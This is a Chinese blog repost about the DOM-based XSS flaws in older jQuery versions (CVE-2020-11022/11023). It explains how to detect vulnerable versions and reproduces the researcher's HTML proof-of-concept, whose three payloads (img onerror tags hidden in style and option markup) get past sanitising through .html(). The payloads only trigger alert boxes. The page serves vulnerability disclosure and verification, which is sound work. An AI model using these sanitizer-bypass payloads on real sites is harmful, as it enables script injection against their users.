当前位置:   article > 正文

jQuery导致的XSS跨站漏洞_jquery xss

jquery xss

漏洞详情:

在JQuery的诸多发行版本中,存在着DOM-based XSS跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。

漏洞发现:

最简单方式,通过火狐浏览器的retire.js插件,访问目标网站发现。

或者通过扫描器,找到JQuery版本信息

漏洞验证:

漏洞发现者提供了JavaScript XSS Demo POC,使用POC验证漏洞情况

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <meta charset="utf-8">
  5. <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
  6. <script src="http://xxxxxxxxxxxxxx/js/common/jquery-2.1.3.min.js"></script>
  7. </head>
  8. <body>
  9. <script>
  10. function test(n,jq){
  11. sanitizedHTML = document.getElementById('poc'+n).innerHTML;
  12. if(jq){
  13. $('#div').html(sanitizedHTML);
  14. }else{
  15. div.innerHTML=sanitizedHTML;
  16. }
  17. }
  18. </script>
  19. <h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
  20. <p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>
  21. <h2>PoC 1</h2>
  22. <button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
  23. <xmp id="poc1">
  24. <style><style /><img src=x onerror=alert(2)>
  25. </xmp>
  26. <h2>PoC 2 (Only jQuery 3.x affected)</h2>
  27. <button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
  28. <xmp id="poc2">
  29. <img alt="<x" title="/><img src=x onerror=alert("1st")>">
  30. </xmp>
  31. <h2>PoC 3</h2>
  32. <button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
  33. <xmp id="poc3">
  34. <option><style></option></select><img src=x onerror=alert("1st")></style>
  35. </xmp>
  36. <div id="div"></div>
  37. </body>
  38. </html>

点击POC1下的Append via .html,xss弹窗

F12查看源代码发现div下<style>标签被闭合,执行<img>中onerror的弹窗

其他就不做演示,可自行查看。

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/695879
推荐阅读
相关标签
  

闽ICP备14008679号